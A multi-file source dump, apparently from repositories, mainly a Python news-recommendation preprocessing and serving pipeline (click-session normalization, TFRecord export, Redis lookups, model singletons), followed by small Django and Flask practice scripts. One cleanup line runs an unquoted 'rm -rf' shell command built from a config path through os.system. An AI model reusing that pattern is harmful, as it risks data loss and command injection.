key=lambda x: "{:0>5}".format(x.split('=')[1]))
for hour_folder in hour_folders:
hour_index = int(hour_folder.split('=')[1])
hour_folder_path = os.path.join(folder_path, hour_folder)
sessions_hour = load_sessions_hour(hour_folder_path)
yield (hour_index, sessions_hour)
numeric_scalers = {
'_elapsed_ms_since_last_click': {
#Set Maximum of 60 min, just to separate returning users, whose elapsed time since last click will be greater than the max 30-min limit for sessions
'valid_max': 60 * 60 * 1000.0,
'avg': 789935.7,
'stddev': 1371436.0},
'active_time_secs': {
'valid_max': 900.0,
'avg': 65.0,
'stddev': 69.37},
'active_time_secs_by_word': {
'valid_max': 10.0,
'avg': 1.854,
'stddev': 1.474},
'text_length':{
'avg':728
}
}
def standardize_num_feature(feature, values):
scaler_config = numeric_scalers[feature]
normalizer = lambda x: (min(int(x), scaler_config['valid_max']) - scaler_config['avg']) / scaler_config['stddev']
return list([normalizer(value) for value in values])
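# Illustration (added comment, not in the original file): values are clipped at
# 'valid_max' and then z-scored with the precomputed statistics above, e.g. for
# 'active_time_secs' (valid_max=900, avg=65.0, stddev=69.37):
#   standardize_num_feature('active_time_secs', [65.0])   -> [0.0]
#   standardize_num_feature('active_time_secs', [1200.0]) -> [(900 - 65.0) / 69.37]  (~12.04)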
def get_cicled_feature_value(value, max_value):
value_scaled = (value + 0.000001) / max_value
value_sin = np.sin(2*np.pi*value_scaled)
value_cos = np.cos(2*np.pi*value_scaled)
return value_sin, value_cos
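# Illustration (added comment, not in the original file): the cyclic encoding keeps
# hours that are adjacent on the clock close in feature space, e.g.
#   get_cicled_feature_value(23, 24) -> (~-0.26, ~0.97)
#   get_cicled_feature_value(0, 24)  -> (~0.00,  ~1.00)
# whereas a raw 0-23 integer encoding would place 23h and 0h far apart.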
def process_session_clicks_features(sessions_hour, get_article_text_length_fn):
sessions = []
session_count = 0
clicked_articles_ids = []
unique_clicked_articles = set()
#Normalizing numerical features (standardization) and creating time features
for session in sessions_hour:
session_count += 1
#TODO add session view here
for click in session['clicks']:
# local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
# "Europe/Oslo")
local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
"Asia/Ho_Chi_Minh")
#Normalizing weekday feature
click['weekday'] = (local_weekday+1-3.5)/7
#Transforming the hour in two "cyclic" features, so that the network
#can understand, for example, that 11pm-0am and 0am-1am are both one hour apart
click['time_hour_sin'], click['time_hour_cos'] = get_cicled_feature_value(local_hour, 24)
#Applying standardization on elapsed time
click['_elapsed_ms_since_last_click'] = standardize_num_feature('_elapsed_ms_since_last_click', [click['_elapsed_ms_since_last_click']])[0]
#If active_time_secs is not available, use the average
if 'active_time_secs' not in click:
click['active_time_secs'] = numeric_scalers['active_time_secs']['avg']
#Normalizing reading time by article length (#words)
click['active_time_secs_by_word'] = click['active_time_secs'] / get_article_text_length_fn(click['article_id'])
#Applying standardization
click['active_time_secs_by_word'] = standardize_num_feature('active_time_secs_by_word', [click['active_time_secs_by_word']])[0]
#Removing unnormalized feature
del click['active_time_secs']
#Applying standardization in this feature
#click['active_time_secs'] = standardize_num_feature('active_time_secs', [click['active_time_secs']])[0]
#Copying click attributes as lists in the session
for key in click:
if key != "user_id":
if key not in session:
session[key] = [click[key]]
else:
session[key].append(click[key])
clicked_articles_ids.append(click['article_id'])
unique_clicked_articles.add(click['article_id'])
#Removing clicks property, as its values were copied to individual list columns
del session['clicks']
sessions.append(session)
#Ensuring sessions within the hour are sorted by session id (time)
sessions_df = pd.DataFrame(sessions).sort_values('session_id')
#Printing stats
# print("clicked_articles_ids")
# print(clicked_articles_ids)
clicks_by_articles_counter = dict(Counter(clicked_articles_ids))
clicks_by_articles = np.array(list(clicks_by_articles_counter.values()))
total_clicks = np.sum(clicks_by_articles)
clicks_by_articles_norm = clicks_by_articles / total_clicks
clicks_by_articles_norm_mean = np.mean(clicks_by_articles_norm)
clicks_by_articles_norm_median = np.median(clicks_by_articles_norm)
stats = {'session_count': session_count,
'clicks': total_clicks,
'clicks_by_session': total_clicks / session_count,
'unique_articles': len(unique_clicked_articles),
'clicks_by_article':float(total_clicks)/len(unique_clicked_articles),
'norm_pop_mean': clicks_by_articles_norm_mean,
'norm_pop_median': clicks_by_articles_norm_median,
'gini_index': gini_index(clicks_by_articles.astype(np.float32))
}
print("Stats :{}".format(stats))
# sessions_df: pandas dataframe
# stats: dictionary
# clicks_by_articles_counter: dictionary
return sessions_df, stats, clicks_by_articles_counter
def make_sequence_example(row):
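    # Pack one session row into a tf.SequenceExample: session-level fields go into the context, per-click lists into the feature lists.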
context_features = {
'session_id': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_id']])),
'session_size': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_size']])),
'session_start': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_start']])),
'user_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[row['user_id'].encode()])),
}
context = tf.train.Features(feature=context_features)
sequence_features = {
'event_timestamp': make_sequential_feature(row["timestamp"]),
#Categorical features
'item_clicked': make_sequential_feature(row["article_id"]),
'city': make_sequential_feature(row["city"]),
# 'region': make_sequential_feature(row["region"]),
# 'country': make_sequential_feature(row["country"]),
# 'device': make_sequential_feature(row["device"]),
'os': make_sequential_feature(row["os"]),
# 'referrer_class': make_sequential_feature(row["referrer_class"]),
'weekday': make_sequential_feature(row["weekday"], vtype=float),
'local_hour_sin': make_sequential_feature(row["time_hour_sin"], vtype=float),
'local_hour_cos': make_sequential_feature(row["time_hour_cos"], vtype=float),
'user_elapsed_ms_since_last_click': make_sequential_feature(row["_elapsed_ms_since_last_click"], vtype=float),
'active_time_secs_by_word': make_sequential_feature(row["active_time_secs_by_word"], vtype=float),
#To debug
'url': make_sequential_feature(row["url"], vtype=str),
}
sequence_feature_lists = tf.train.FeatureLists(feature_list=sequence_features)
return tf.train.SequenceExample(feature_lists=sequence_feature_lists,
context=context
)
def export_sessions_hour_to_tf_records(hour_index, sessions_df, output_path):
export_file_template = output_path.replace('*', '{0:04d}')
print("Exporting hour {} (# sessions: {})".format(hour_index, len(sessions_df)))
save_rows_to_tf_record_file(map(lambda x: x[1], sessions_df.iterrows()),
make_sequence_example,
export_filename=export_file_template.format(hour_index))
def save_nar_preprocessing_resources(output_path, nar_label_encoders_dict, nar_numeric_scalers):
to_serialize = {'nar_label_encoders': nar_label_encoders_dict,
'nar_numeric_scalers': nar_numeric_scalers}
serialize(output_path, to_serialize)
def compute_total_clicks_by_article_stats(clicks_by_articles_counters):
result = defaultdict(int)
for hour_counters in clicks_by_articles_counters:
for article_key in hour_counters.keys():
result[article_key] += hour_counters[article_key]
return result
def delete_all_file_in_path(path):
files = glob.glob(path+'*')
for f in files:
os.remove(f)
def get_date_time_current():
now = datetime.now()
timestamp = int(datetime.timestamp(now))
return timestamp
def parse_newsId_from_url(url):
parse_str = re.search('(?<=-)([\d]+|[\d]+rf[\d]+)(?=.chn)',url)
if parse_str:
parse_str = parse_str.group()
# parse "newsId1rfnewsId2" for popup, return newsId1
# example: cafebiz.vn/te-nuoc-theo-mua-viet-nam-co-nam-co-hoi-giam-lai-suat-dieu-hanh-201908121346105rf20190925103622081.chn
if "rf" in parse_str:
return int(parse_str.split("rf")[0])
return int(parse_str)
else:
return "'<PAD>'"
def preprocess_for_predict(user_id,news_id, get_article_text_length_fn):
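    # Build a single-session SequenceExample for online prediction: read the user's page views from Redis
    # (falling back to average values for unseen users), append the currently requested article, and apply
    # the same feature normalization used for training.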
# print("==========> Test into preprocess_for_predict")
session = {}
redis = RedisClient("localhost")
page_view_list = redis.getPageView(user_id)
    if len(page_view_list) == 0:  # empty: new user with no page views logged in Redis yet
# print("=>>>>>>>pageview is empty")
        tor = numeric_scalers['active_time_secs']['avg']  # fall back to the average active time
page_view = PageView("-" + news_id + ".chn", get_date_time_current(), 0, tor)
page_view_list.append(page_view)
user_info = Session(user_id, 0,get_date_time_current(), 1)
# user_info.guid = user_id
# user_info.locId = 0
# user_info.osCode = 1
# user_info.timeNow = get_date_time_current()
session['session_size'] = len(page_view_list)
session['session_id'] = user_info.timeNow
session['session_start'] = user_info.timeNow
session['user_id'] = user_info.guid
else:
        # compute the average time-on-read over the logged page views
# print("=>>>>>>>pageview is no empty")
tor = 0
for i in range(0, len(page_view_list)):
tor += page_view_list[i].timeOnRead
tor = tor/len(page_view_list)
page_view = PageView("-"+news_id+".chn",get_date_time_current(),0,tor)
page_view_list.append(page_view)
# print("<<<<<<<<<<<,,page_view_list>>>>>>>>>>>>")
# for i in range(0, len(page_view_list)):
# print(page_view_list[i])
# print(page_view_list)
user_info = redis.getUserInfo(user_id)
session['session_size'] = len(page_view_list)
session['session_id'] = user_info.timeNow
session['session_start'] = user_info.timeNow
session['user_id'] = user_info.guid
#Get output filename
output_file_name = str(user_info.timeNow)+"_"+str(user_info.guid)+".tfrecord.gz"
clicks = []
pickle =ACR_Pickle_Singleton.getInstance()
for pv in page_view_list:
click = {}
click['_elapsed_ms_since_last_click'] = (pv.timeNow - user_info.timeNow)*1000
click['active_time_secs'] = pv.timeOnRead
# print("============================================="+ str(parse_newsId_from_url(pv.url)))
click['article_id'] = pickle.get_article_id_encoded(parse_newsId_from_url(pv.url))
click['city'] = user_info.locId
click['os'] = user_info.osCode
click['timestamp'] = pv.timeNow * 1000
click['url'] = pv.url
click['user_id'] = user_info.guid
# test tungtv
# print(" click['user_id'] {}:".format(click['user_id']))
# print(" click['article_id'] {}".format(click['article_id']))
clicks.append(click)
session['clicks'] = clicks
sessions = []
session_count = 0
clicked_articles_ids = []
unique_clicked_articles = set()
#Normalizing numerical features (standardization) and creating time features
#TODO add session view here
for click in session['clicks']:
# local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
# "Europe/Oslo")
local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
"Asia/Ho_Chi_Minh")
#Normalizing weekday feature
click['weekday'] = (local_weekday+1-3.5)/7
#Transforming the hour in two "cyclic" features, so that the network
#can understand, for example, that there is one hour of difference between both 11pm to 0am and from 0am to 1am
click['time_hour_sin'], click['time_hour_cos'] = get_cicled_feature_value(local_hour, 24)
#Applying standardization on elapsed time
click['_elapsed_ms_since_last_click'] = standardize_num_feature('_elapsed_ms_since_last_click', [click['_elapsed_ms_since_last_click']])[0]
#If active_time_secs is not available, use the average
if 'active_time_secs' not in click:
click['active_time_secs'] = numeric_scalers['active_time_secs']['avg']
#Normalizing reading time by article length (#words)
click['active_time_secs_by_word'] = click['active_time_secs'] / get_article_text_length_fn(click['article_id'])
#Applying standardization
click['active_time_secs_by_word'] = standardize_num_feature('active_time_secs_by_word', [click['active_time_secs_by_word']])[0]
#Removing unnormalized feature
del click['active_time_secs']
#Applying standardization in this feature
#click['active_time_secs'] = standardize_num_feature('active_time_secs', [click['active_time_secs']])[0]
#Copying click attributes as lists in the session
for key in click:
if key != "user_id":
if key not in session:
session[key] = [click[key]]
else:
session[key].append(click[key])
clicked_articles_ids.append(click['article_id'])
unique_clicked_articles.add(click['article_id'])
#Removing clicks property, as its values were copied to individual list columns
del session['clicks']
sessions.append(session)
#Ensuring sessions within the hour are sorted by session id (time)
sessions_df = pd.DataFrame(sessions).sort_values('session_id')
output_file = "./nardata/tmp/"+output_file_name
os.makedirs("./nardata/tmp/", exist_ok=True)
# save_rows_to_tf_record_file(map(lambda x: x[1], sessions_df.iterrows()), make_sequence_example, output_file)
# return output_file
    # sessions_df holds exactly one session here; serialize it as a SequenceExample string
    for row in sessions_df.iterrows():
        seq_example = make_sequence_example(row[1])
        return seq_example.SerializeToString()
def split_string(path):
afiles = []
for root, dirs, files in os.walk(path):
for filename in files:
afiles.append(filename)
afiles.sort()
string = afiles[-1].split('.')[0]
return int(string.split('_')[-1])
def delete_file_keep_in_two_week(path, num_hour):
afiles = []
for root, dirs, files in os.walk(path):
for filename in files:
afiles.append(filename)
afiles.sort()
# a = 24*14
files = afiles[:-num_hour]
for f in files:
os.remove(path + "/" + f)
def main_nar_preprocess_2():
#def main():
# parser = create_args_parser()
# args = parser.parse_args()
print("<=== STARTING NAR PREPROCESS 2 ===> ")
# parameter = load_json_config("./parameter.json")
parameter = load_json_config("./parameter.json")
list_args = parameter["nar_preprocess_2"]
DATA_DIR = parameter["DATA_DIR"]
num_day = list_args["num_day"]
input_sessions_json_folder_path = DATA_DIR + list_args["input_sessions_json_folder_path"]
input_acr_metadata_embeddings_path = DATA_DIR + list_args["input_acr_metadata_embeddings_path"]
input_nar_encoders_dict_path = DATA_DIR + list_args["input_nar_encoders_dict_path"]
number_hours_to_preprocess = list_args["number_hours_to_preprocess"]
output_nar_preprocessing_resources_path = DATA_DIR + list_args["output_nar_preprocessing_resources_path"]
output_sessions_tfrecords_path = DATA_DIR + list_args["output_sessions_tfrecords_path"]
if path.exists(output_nar_preprocessing_resources_path):
pass
else:
import os
os.makedirs(output_nar_preprocessing_resources_path)
print('Loading resources generated ACR module (articles metadata)')
# truyen file
get_article_text_length_fn, get_article_id_encoded_fn = load_acr_module_resources(get_all_file(input_acr_metadata_embeddings_path)[0])
#get_article_text_length_fn = None
# # degub
# print(get_article_text_length_fn)
print('Loading resources generated by the first step of NAR preprocessing (cat. features dict encoders)')
nar_encoders_dict = load_nar_module_resources(get_all_file(input_nar_encoders_dict_path)[0])
print('Loading sessions from folder: {}'.format(input_sessions_json_folder_path))
print('Exporting TFRecords to: {}'.format(output_sessions_tfrecords_path))
# delete file .part*
# from subprocess import Popen
# var1 = DATA_DIR+input_sessions_json_folder_path+"session_hour=*/.*"
# Process = Popen(['./nar_module/scripts/remove_hiden_file.sh %s' % str(var1)], shell=True)
import os
var1 ='rm -rf '+ input_sessions_json_folder_path + "/session_hour=*/.*"
print(var1)
myCmd = var1
    if os.system(myCmd) == 0:
        print("Removed hidden session files successfully")
    else:
        print("Failed to remove hidden session files")
# split path output_sessions_tfrecords_path
path_tf = DATA_DIR +'/'+list_args["output_sessions_tfrecords_path"].split('/')[1]
if path.exists(path_tf):
pass
else:
import os
os.makedirs(path_tf)
clicks_by_articles_counters = []
#a = preprocess_for_predict("2265891616712405988", get_article_text_length_fn, get_article_id_encoded_fn)
for (hour_index, sessions_hour) in load_sessions_hours(input_sessions_json_folder_path):
# check directory empty:
if len(os.listdir(DATA_DIR+"/sessions_tfrecords_by_hour/")) != 0:
hour_index = split_string(DATA_DIR+"/sessions_tfrecords_by_hour/")+1
print('Processing hour {}'.format(hour_index))
####compute_global_metrics(sessions_hour)
sessions_hour_df, hour_stats, hour_clicks_by_articles_counter = process_session_clicks_features(sessions_hour, get_article_text_length_fn)
#sessions_hour_df.to_csv('hour-{}-to-debug.csv'.format(hour_index))
hour_stats['_hour_index'] = hour_index
#stats.append(hour_stats)
clicks_by_articles_counters.append(hour_clicks_by_articles_counter)
# sessions_hour_df.to_csv(DATA_DIR+"/sessions_tfrecords_by_hour/sessions_hour_df.csv", index=False)
export_sessions_hour_to_tf_records(hour_index, sessions_hour_df,
output_path=output_sessions_tfrecords_path)
# print('')
# if number_hours_to_preprocess >= 0 and hour_index == number_hours_to_preprocess:
# break
print()
print('Exporting Categorical Feature encoders and Numeric scalers dicts: {}'.format(output_nar_preprocessing_resources_path))
save_nar_preprocessing_resources(output_nar_preprocessing_resources_path + "nar_preprocessing_resources.pickle",
nar_encoders_dict,
numeric_scalers)
# delete to keep tf record in 2 week nearest
# after export tfrecord for trainning, delete all file in input_sessions_json_folder_path
if len(os.listdir(DATA_DIR + "/sessions_tfrecords_by_hour/")) > 24*num_day:
delete_file_keep_in_two_week(DATA_DIR+"/sessions_tfrecords_by_hour/", 24*num_day)
# delete_all_file_in_path(input_sessions_json_folder_path)
print("<=== END NAR PREPROCESS 2 ===> ")
if __name__ == '__main__':
main_nar_preprocess_2()
```
#### File: bigdataproj/pick_singleton/pick_singleton.py
```python
from acr_module.acr.acr_module_service import load_json_config
# from nar_module.nar.nar_trainer_cafebiz_full import NAR_Model_Predict
from nar_module.nar.nar_model import get_list_id
from nar_module.nar.nar_utils import load_nar_module_preprocessing_resources
from nar_module.nar.utils import deserialize
from nar_module.nar.benchmarks import SequentialRulesRecommender
class Singleton(type):
"""
    A metaclass for singletons. Every singleton class should use it by declaring 'metaclass=Singleton'.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class ACR_Pickle_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self):
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
self.acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings/acr_articles_metadata_embeddings.pickle"
self.model_nar_dir = parameter["DATA_DIR"] + parameter["model_dir_nar"]
print("Singleton ACR Init")
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(self.acr_path)
self.acr_label_encoders = acr_label_encoders
self.articles_metadata_df =articles_metadata_df
# self.reverse_acr_article_id = {}
self.reverse_acr_article_id = {v: k for k, v in acr_label_encoders['article_id'].items()}
self.content_article_embeddings_matrix = content_article_embeddings
# get list_id
list_id = get_list_id()
encoded_list_id=[]
for id in list_id:
if (int(id) in acr_label_encoders['article_id']):
encoded_list_id.append(self.get_article_id_encoded(int(id)))
list_id_week_encoded = list(articles_metadata_df['article_id'])[-600:]
encoded_list_id = list_id_week_encoded + encoded_list_id
list_id_week = list(acr_label_encoders['article_id'].keys())[-600:]
self.list_id = list(list_id) + list_id_week
self.encoded_list_id = encoded_list_id
# print("Loading ACR singleton")
ACR_Pickle_Singleton.__instance = self
print("Done SingleTon Init Done")
@staticmethod
def getInstance():
if ACR_Pickle_Singleton.__instance == None:
# print("ACR is none")
ACR_Pickle_Singleton()
return ACR_Pickle_Singleton.__instance
def getUpdateInstance(self, acr_label_encoders,reverse_acr_article_id, articles_metadata_df, content_article_embeddings_matrix):
self.acr_label_encoders = acr_label_encoders
self.reverse_acr_article_id = reverse_acr_article_id
self.articles_metadata_df = articles_metadata_df
self.content_article_embeddings_matrix = content_article_embeddings_matrix
# print("ACR singleton update")
ACR_Pickle_Singleton.__instance = self
print("Into ACR Update Instance")
# NAR_Model_Predict.getUpdateInstance()
return self.acr_label_encoders , self.articles_metadata_df, self.content_article_embeddings_matrix
def getUpdateInstance_byFlask(self):
print("Into ACR Update Instance by Flask")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
# acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings_predict/acr_articles_metadata_embeddings_predict.pickle"
# acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings/acr_articles_metadata_embeddings.pickle"
self.model_nar_dir = parameter["DATA_DIR"] + parameter["model_dir_nar"]
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(self.acr_path)
self.acr_label_encoders = acr_label_encoders
self.articles_metadata_df = articles_metadata_df
# self.reverse_acr_article_id = {}
self.reverse_acr_article_id = {v: k for k, v in acr_label_encoders['article_id'].items()}
self.content_article_embeddings_matrix = content_article_embeddings
# get list_id
list_id = get_list_id()
encoded_list_id = []
for id in list_id:
if (int(id) in acr_label_encoders['article_id']):
encoded_list_id.append(self.get_article_id_encoded(int(id)))
list_id_week_encoded = list(articles_metadata_df['article_id'])[-600:]
encoded_list_id = list_id_week_encoded + encoded_list_id
list_id_week = list(acr_label_encoders['article_id'].keys())[-600:]
self.list_id = list(list_id) + list_id_week
self.encoded_list_id = encoded_list_id
# print("Loading ACR singleton")
ACR_Pickle_Singleton.__instance = self
print("Done Update SingleTon Flask Init Done")
def get_article_id(self, article_id_encoded):
try:
return str(self.reverse_acr_article_id[article_id_encoded])
except Exception as ex:
return self.reverse_acr_article_id['article_id'][0]
def get_article_id_encoded(self,article_id):
try:
return self.acr_label_encoders['article_id'][article_id]
except Exception as ex:
return self.acr_label_encoders['article_id']['<PAD>']
class NAR_Pickle_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self):
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
nar_path = parameter["DATA_DIR"] + "/pickles/nar_preprocessing_resources/nar_preprocessing_resources.pickle"
self= load_nar_module_preprocessing_resources(nar_path)
# print("Loading NAR singleton")
NAR_Pickle_Singleton.__instance = self
@staticmethod
def getInstance():
if NAR_Pickle_Singleton.__instance == None:
# print("NAR singleton is none")
NAR_Pickle_Singleton()
return NAR_Pickle_Singleton.__instance
def getUpdaetInstance(self):
print("Into update nar encoder singleton")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
nar_path = parameter["DATA_DIR"] + "/pickles/nar_preprocessing_resources/nar_preprocessing_resources.pickle"
self = load_nar_module_preprocessing_resources(nar_path)
# print("Loading NAR singleton")
NAR_Pickle_Singleton.__instance = self
from nar_module.nar.datasets import prepare_dataset_iterator
from nar_module.nar.utils import resolve_files, chunks
import tensorflow as tf
class SRModel_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self,training_hour=7*24,batch_size=64,truncate_session_length=20):
self.params = {'max_clicks_dist': 10, #Max number of clicks to walk back in the session from the currently viewed item. (Default value: 10)
'dist_between_clicks_decay': 'div' #Decay function for distance between two items clicks within a session (linear, same, div, log, qudratic). (Default value: div)
}
self.training_hour = training_hour
self.batch_size = batch_size
self.truncate_session_length = truncate_session_length
self.clf = SequentialRulesRecommender(None, self.params, None)
self.predictions = {}
SRModel_Singleton.__instance = self
@staticmethod
def getInstance():
if SRModel_Singleton.__instance == None:
# print("NAR singleton is none")
SRModel_Singleton()
return SRModel_Singleton.__instance
def update_rule(self):
clf = SequentialRulesRecommender(None, self.params, None)
clf.rules['test'] = 2
nar_label_encoders = NAR_Pickle_Singleton.getInstance()
self.train(clf,nar_label_encoders)
def train(self, clf,nar_label_encoders):
from nar_module.nar.nar_trainer_cafebiz_full import get_session_features_config
session_features_config = get_session_features_config(nar_label_encoders)
train_data = self.get_training_files(self.training_hour)
# print(train_data)
it = prepare_dataset_iterator(train_data, session_features_config,
batch_size=self.batch_size,
truncate_session_length=self.truncate_session_length)
count = 0
with tf.Session() as sess:
while True:
try:
data_it = sess.run(it)
#convert encoded id to id
acr_pickle = ACR_Pickle_Singleton.getInstance()
# print("BEFORE")
# print("CLICKED")
# print(data_it[0]['item_clicked'])
# print("LABEL")
# print(data_it[1]['label_next_item'])
# data_it[0]['item_clicked'].astype(str)
# data_it[1]['label_next_item'].astype(str)
self.convert_encoded_ids(data_it[0]['item_clicked'])
self.convert_encoded_ids(data_it[1]['label_next_item'])
count +=1
clf.train(data_it[0]['user_id'],data_it[0]['session_id'],
data_it[0]['item_clicked'],data_it[1]['label_next_item'])
except tf.errors.OutOfRangeError:
break
print("Total training sample: "+ str(count*self.batch_size))
# print("-----------------")
# print(clf.rules)
# print("int 20190607183749984")
# print(clf.rules[20190607183749984])
# print("str 20190607183749984")
# print(clf.rules["20190607183749984"])
# print(self.clf.rules[5108])
self.clf = clf
def convert_encoded_ids(self,clickeds_all_items):
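        # Replace encoded article ids with their original ids in place (0 is kept as padding).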
acr_pickle = ACR_Pickle_Singleton.getInstance()
for i,clicked_items in enumerate(clickeds_all_items):
for j,item in enumerate(clicked_items):
if item != 0:
clickeds_all_items[i][j] = acr_pickle.get_article_id(item)
def get_training_files(self, training_hour):
parameter = load_json_config("./parameter.json")
training_dir = parameter["DATA_DIR"]+ parameter["nar_preprocess_2"]["output_sessions_tfrecords_path"]
train_files = resolve_files(training_dir)[-training_hour:]
# print("TrainFile")
# print(train_files)
return list(chunks(train_files, training_hour))
def predict(self, item_id, valid_items, topk=100,topk_per_item=10):
return self.clf.predict_topk(item_id, topk, topk_per_item, valid_items)
# def pre_calculate_result(news_id_list):
def main():
nar_label_encoders = NAR_Pickle_Singleton.getInstance()
srclassifier = SRModel_Singleton()
sr = SequentialRulesRecommender(None, srclassifier.params, None)
sr.rules['test'] = 1
srclassifier.train(sr,nar_label_encoders)
print(srclassifier.clf.rules['test'])
# srclassifier.update_rule()
# print(srclassifier.clf.rules['test'])
# print("------------------")
# print(srclassifier.predict(3648,100,10,None))
# print(len(set(srclassifier.predict(3648,100,10,None))))
if __name__ == '__main__':
main()
```
#### File: bigdataproj/session_module/sessiondata_pb2_grpc.py
```python
import grpc
import session_module.sessiondata_pb2 as sessiondata__pb2
class SessionDataServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetSessionData = channel.unary_unary(
'/SessionDataService/GetSessionData',
request_serializer=sessiondata__pb2.SessionRequestInfo.SerializeToString,
response_deserializer=sessiondata__pb2.ListsSessions.FromString,
)
self.PingSess = channel.unary_unary(
'/SessionDataService/PingSess',
request_serializer=sessiondata__pb2.PingSessRequest.SerializeToString,
response_deserializer=sessiondata__pb2.PingSessResponse.FromString,
)
class SessionDataServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def GetSessionData(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PingSess(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SessionDataServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetSessionData': grpc.unary_unary_rpc_method_handler(
servicer.GetSessionData,
request_deserializer=sessiondata__pb2.SessionRequestInfo.FromString,
response_serializer=sessiondata__pb2.ListsSessions.SerializeToString,
),
'PingSess': grpc.unary_unary_rpc_method_handler(
servicer.PingSess,
request_deserializer=sessiondata__pb2.PingSessRequest.FromString,
response_serializer=sessiondata__pb2.PingSessResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'SessionDataService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
``` |
{
"source": "13528770807/django_celery",
"score": 2
} |
#### File: qiang_celery/qiang_celery/view.py
```python
from django.http import HttpResponse
from django.shortcuts import render
def hello(request):
return HttpResponse('hello world !')
def index(request):
print('---------1----------')
context = {}
context['hello'] = " Hello the World"
print(context)
return render(request, 'hello.html', context)
``` |
{
"source": "13528770807/flask_project",
"score": 3
} |
#### File: qiang00_before_project/qiang01_view_and_route/q02_route.py
```python
from flask import Flask, request, jsonify, redirect, url_for
# configuration object (commented-out example)
# class Config(object):
# DEBUG = True
app = Flask(__name__)
# app.config.from_object(Config) # load config from an object
# app.config.from_pyfile('config.ini') # load config from a file
# app.config.from_envvar('CONFIGABC') # load config from an environment variable
@app.route('/demo1')
def demo1():
return "demo1"
@app.route('/demo2/<user_id>')
def demo2(user_id):
return 'demo2 %s' % user_id
@app.route('/demo3/<int:user_id2>', methods=['GET', 'POST'])
def demo3(user_id2):
return 'demo3 %d %s' % (user_id2, request.method)
@app.route('/demo4')
def demor():
json = {
'name': 'zhangsan',
'age': 30
}
return jsonify(json)
@app.route('/demo5')
def demo5():
return redirect('https://www.baidu.com')
@app.route('/demo6')
def demo6():
return redirect(url_for('demo3', user_id2=999))
@app.route('/demo7')
def demo7():
return 'code 666', 666
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q02_add_template_filter.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
li = [1, 2, 3, 4, 5, 6, 7]
return render_template('filter.html', li=li)
@app.template_filter('li_rv2')  # register the filter, approach 2: decorator
def li_reverse(li):
res = list(li)
res.reverse()
return res
# app.add_template_filter(li_reverse, 'li_rv')  # register the filter, approach 1: explicit call
if __name__ == "__main__":
app.run(debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q04_01_template_code_reuse_macro.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/test_macro')
def test_macro():
return render_template('test_macro.html')
@app.route('/macro')
def macro():
return render_template('macro.html')
@app.route('/')
def index():
return 'hello'
if __name__ == "__main__":
app.run()
```
#### File: qiang00_before_project/qiang02_the_template/q05_variable_and_function.py
```python
from flask import Flask, render_template, session, g, redirect, url_for, flash
app = Flask(__name__)
app.secret_key = '<KEY>'
@app.route('/set_session_url')
def set_session():
    session['company'] = 'zhongruan'
print('------1---------')
return redirect(url_for('index'))
@app.route('/user/<int:user_id>')
def user(user_id):
return 'user_id: %s ' % user_id
@app.route('/')
def index():
g.name = 'zhangsan'
flash('hahahahahaha')
return render_template('variable.html')
if __name__ == "__main__":
app.run(debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q06_Flask_WTF2.py
```python
from flask import Flask, request, flash, render_template
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, EqualTo
app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False
app.config['SECRET_KEY'] = 'SECRET_KEY'
class RegistForm(FlaskForm):
username = StringField('用户名:', validators=[DataRequired('请输入用户名:')], render_kw={'placeholder': '占位符'})
password = PasswordField('密码', validators=[DataRequired('请输入密码')])
password2 = PasswordField('确认密码', validators=[DataRequired('确认密码'), EqualTo("password", "两次密码不一致")])
submit = SubmitField('提交')
@app.route('/flaskwtf', methods=['GET', 'POST'])
def flaskwtf():
regist = RegistForm()
if regist.validate_on_submit():
username = request.form.get('username')
password = request.form.get('password')
password2 = request.form.get('password2')
print(username, password, password2)
return 'success'
else:
if request.method == 'POST':
flash('参数不完整')
return render_template('flask_wtf2.html', form=regist)
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "13528770807/practice",
"score": 4
} |
#### File: practice/qiang01_test/zq_06_single.py
```python
""" 装饰器
def singleton(cls):
instance = {}
